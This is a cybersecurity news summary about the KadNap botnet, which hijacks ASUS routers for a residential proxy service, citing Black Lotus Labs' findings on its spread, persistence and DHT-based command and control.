Cybersecurity & Privacy

KadNap Botnet Hijacks ASUS Routers for Proxy Network

alex2404
By
alex2404
Byalex2404
Follow:
Disclosure: This website may contain affiliate links, which means I may earn a commission if you click on the link and make a purchase. I only recommend products or services that I personally use and believe will add value to my readers. Your support is appreciated!

A botnet called KadNap has infected 14,000 edge networking devices since August 2025, hijacking ASUS routers to build a proxy network tied to a cybercrime service, according to researchers at Black Lotus Labs.

Contents

The malware converts compromised devices into residential proxies sold through a service called Doppelganger, which researchers believe is a rebrand of the Faceless proxy service — previously linked to the TheMoon malware botnet, which also targeted ASUS hardware. Those proxies are used to funnel malicious traffic, build anonymization layers, and bypass blocklists, enabling attacks including DDoS, credential stuffing, and brute-force campaigns.

How KadNap Spreads and Hides

Infections begin when a malicious shell script, aic.sh, is downloaded from 212.104.141[.]140. The script establishes persistence through a cron job firing every 55 minutes. It then drops an ELF binary named kad, which installs the botnet client, determines the host’s external IP address, and contacts multiple Network Time Protocol servers to retrieve the current time and system uptime.

For command-and-control communications, KadNap uses a modified version of the Kademlia Distributed Hash Table protocol, designed to conceal C2 infrastructure within a peer-to-peer network. “Infected devices use the DHT protocol to locate and connect with a command-and-control server, while defenders cannot easily find and add those C2s to threat lists,” the researchers explain.

The decentralization, however, is imperfect. Black Lotus Labs found that infected devices consistently connect to two specific nodes before reaching C2 servers — a weakness in the implementation that allowed researchers to map the control infrastructure despite the protocol’s obfuscation design.

Network Breakdown

Nearly half of the botnet’s nodes connect to C2 infrastructure dedicated specifically to ASUS-based bots. The remaining devices communicate with two separate control servers. Geographically, 60% of infected devices are located in the United States, with notable concentrations also reported in Taiwan, Hong Kong, and Russia.

More Read

CanisterWorm Hits 47 npm Packages in Trivy Supply Chain Attack
Perseus Android Malware Monitors Notes Apps for Financial Data
Oracle Emergency Patch Fixes Critical RCE Flaw CVE-2026-21992
PolyShell Flaw Enables Unauthenticated RCE on Magento Stores
INTERPOL Seizes 45,000 Malicious IPs in Global Cybercrime Sweep

Lumen Technologies, the parent company of Black Lotus Labs, says it has blocked all network traffic to and from the known control infrastructure on its own network. The company acknowledges the disruption is limited to its own systems and says a list of indicators of compromise will be released to help other operators act against the botnet independently.

The connection to Doppelganger and its predecessor services points to an established commercial model: operators build botnets from consumer and small-business routers, then sell access to the infected pool as a proxy service. The end customers of that service bear the direct exposure to the attacks it enables, while the actual victims are the device owners whose hardware is quietly recruited into the network.

Photo by Brett Sayles on Pexels

This article is a curated summary based on third-party sources. Source: Read the original article

TAGGED:
Share This Article
Previous Article Google Play Games PC Gets Premium Titles and Cross-Buy
Next Article UK Sovereign AI Fund Launches With £500M for Domestic Tech
Archives